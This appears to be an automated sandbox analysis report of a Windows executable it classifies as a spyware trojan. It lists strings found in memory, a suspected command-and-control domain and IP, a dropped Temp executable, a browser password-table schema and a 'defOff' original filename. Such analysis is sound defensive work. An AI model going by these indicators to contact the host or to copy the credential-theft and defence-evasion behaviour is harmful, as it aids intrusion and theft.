          Source: file.exe, 00000006.00000003.1354818335.0000000001326000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
          Source: file.exe, 00000006.00000003.1354818335.0000000001326000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
          Source: file.exe, 00000006.00000002.1512219252.0000000005D00000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1319947232.000000000130C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/
          Source: file.exe, 00000006.00000002.1512219252.0000000005D00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/95hEL9zzrqbevk/6
          Source: file.exe, 00000006.00000003.1374058395.000000000130C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/api
          Source: file.exe, 00000006.00000003.1507177296.00000000012FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1509488766.00000000012FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000003.1507466108.00000000012FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/apiV
          Source: file.exe, 00000006.00000003.1340486547.0000000005D03000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1336025053.0000000005D02000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1342141043.0000000005D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/p
          Source: file.exe, 00000006.00000002.1512219252.0000000005D00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/s
          Source: file.exe, 00000006.00000003.1320523200.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320592816.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320743875.0000000005D47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: file.exe, 00000006.00000003.1320523200.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320592816.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320743875.0000000005D47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: file.exe, 00000006.00000003.1320523200.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320592816.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320743875.0000000005D47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: file.exe, 00000006.00000003.1354818335.0000000001326000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
          Source: file.exe, 00000006.00000003.1354559370.0000000006029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: file.exe, 00000006.00000003.1354559370.0000000006029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
          Source: file.exe, 00000006.00000003.1354818335.0000000001326000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
          Source: file.exe, 00000006.00000003.1320523200.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320592816.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320743875.0000000005D47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: file.exe, 00000006.00000003.1320523200.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320592816.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320743875.0000000005D47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: file.exe, 00000006.00000003.1354818335.0000000001326000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
          Source: file.exe, 00000006.00000003.1354559370.0000000006029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
          Source: file.exe, 00000006.00000003.1354559370.0000000006029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
          Source: file.exe, 00000006.00000003.1354559370.0000000006029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
          Source: file.exe, 00000006.00000003.1354559370.0000000006029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: file.exe, 00000006.00000003.1354559370.0000000006029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
          Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.7:49700 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.7:49702 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.7:49703 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.7:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.7:49720 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.7:49731 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.7:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.7:49763 version: TLS 1.2

          System Summary

          barindex
          PE file contains section with special chars
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: .rsrc
          Source: file.exeStatic PE information: section name: .idata
          Source: AU963ROPSBOYUMXP3FF.exe.6.drStatic PE information: section name:
          Source: AU963ROPSBOYUMXP3FF.exe.6.drStatic PE information: section name: .idata
          Source: C:\Users\user\Desktop\file.exeCode function: 6_3_01318AC96_3_01318AC9
          Source: C:\Users\user\Desktop\file.exeCode function: 6_3_01318AC96_3_01318AC9
          Source: C:\Users\user\Desktop\file.exeCode function: 6_3_013070B06_3_013070B0
          Source: C:\Users\user\Desktop\file.exeCode function: 6_3_01318AC96_3_01318AC9
          Source: C:\Users\user\Desktop\file.exeCode function: 6_3_01318AC96_3_01318AC9
          Source: C:\Users\user\Desktop\file.exeCode function: 6_3_01318AC96_3_01318AC9
          Source: C:\Users\user\Desktop\file.exeCode function: 6_3_01318AC96_3_01318AC9
          Source: C:\Users\user\Desktop\file.exeCode function: 6_3_013070B06_3_013070B0
          Source: C:\Users\user\Desktop\file.exeCode function: 6_3_01318AC96_3_01318AC9
          Source: C:\Users\user\Desktop\file.exeCode function: 6_3_01318AC96_3_01318AC9
          Source: C:\Users\user\Desktop\file.exeCode function: 6_3_01318AC96_3_01318AC9
          Source: C:\Users\user\Desktop\file.exeCode function: 6_3_01318AC96_3_01318AC9
          Source: C:\Users\user\Desktop\file.exeCode function: 6_3_05D09FC56_3_05D09FC5
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0118600010_2_01186000
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0118A4E510_2_0118A4E5
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0100DAE510_2_0100DAE5
          Source: file.exe, 00000006.00000003.1477001069.000000000628F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1477346613.0000000005B48000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1472763109.0000000006114000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1486716887.0000000006118000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1482357093.0000000006119000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1485676367.0000000006115000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1488583650.000000000637C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1483114130.0000000006114000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1478137734.00000000061D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1485806011.0000000006231000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1482578297.00000000062FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1486181427.0000000006236000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1479957889.0000000006120000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1486058353.000000000611C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1481964307.0000000006211000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1471880274.0000000005E40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1485937055.000000000634F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1483349323.00000000062FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1480483437.00000000061FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1478831408.00000000061D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1474434832.0000000005B47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1480982542.00000000061F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1472623040.0000000005B42000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1488230878.0000000006115000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1475863221.0000000006114000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1474730910.0000000005B4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1486562975.000000000624B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1481698686.00000000062D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1476732757.00000000061D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1482237086.0000000006205000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1474585653.000000000611D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1482118537.000000000611D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1479358404.000000000611A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1507084120.0000000005D0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1476059394.0000000005B42000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1484398234.000000000631A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1478233191.0000000006287000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1476444348.0000000006112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1481845284.000000000611F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1506923908.0000000001314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1485273025.0000000006116000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1479737672.00000000061EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1475178486.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1474134706.0000000005B4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1483463872.000000000611F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1478611698.00000000061D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1488987006.000000000611D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1475356313.000000000611F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1483848114.000000000621B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1487945346.000000000611A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1487732821.0000000006248000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1477797751.0000000006116000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1484900038.0000000006222000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1506869973.0000000005D2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1482987986.0000000006206000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1480199072.0000000006118000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1483712260.0000000006114000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1484265624.0000000006212000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1478522691.000000000611A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1478326732.000000000611F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1485027282.0000000006340000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1506821801.0000000005E02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1490410303.0000000006116000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1478720910.0000000006114000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1479236402.00000000061EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1481560850.00000000061F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1482470638.000000000620D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1507447830.0000000001327000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1485406985.000000000622E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1473817639.000000000611C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1484624401.000000000622B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1475500034.0000000005B44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1483235074.0000000006204000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1506769950.0000000005D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1486436460.000000000611C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1473401304.0000000006117000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1478961905.00000000062A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1484520430.0000000006116000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1479092807.000000000611B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1488087223.000000000624B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1472309793.0000000006114000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1489412594.0000000006260000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1484741363.0000000006112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1507409180.0000000001306000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1483591016.000000000621A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1481424478.0000000006118000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1506965257.0000000005D04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1487321381.0000000006118000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1487110780.0000000006358000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1488399834.0000000006246000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1480710054.000000000611A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1473176627.0000000005B4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1474282018.0000000006118000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1479603899.0000000006113000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1495710228.0000000006253000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1475001549.0000000006113000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1482864015.0000000006113000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1505951028.000000000668B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1480066351.00000000061F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1472179004.0000000005B51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1484143223.0000000006116000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1479477995.00000000061E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1486311928.000000000635E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1479847820.00000000062BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1486909283.0000000006236000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1481280668.00000000061F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1473542970.0000000005B50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1478422788.00000000061D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1485540388.0000000006349000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000006.00000003.1481149101.0000000006112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: file.exeStatic PE information: Section: ZLIB complexity 0.9979672805642633
          Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@2/2
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AU963ROPSBOYUMXP3FF.exe.logJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeMutant created: NULL
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user~1\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: file.exe, 00000006.00000003.1320377590.0000000005D34000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320687552.0000000005D06000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1340917231.0000000005D52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: AU963ROPSBOYUMXP3FF.exeString found in binary or memory: 3The file %s is missing. Please, re-install this application
          Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
          Source: file.exeString found in binary or memory: RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNe
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exe "C:\Users\user~1\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exe"
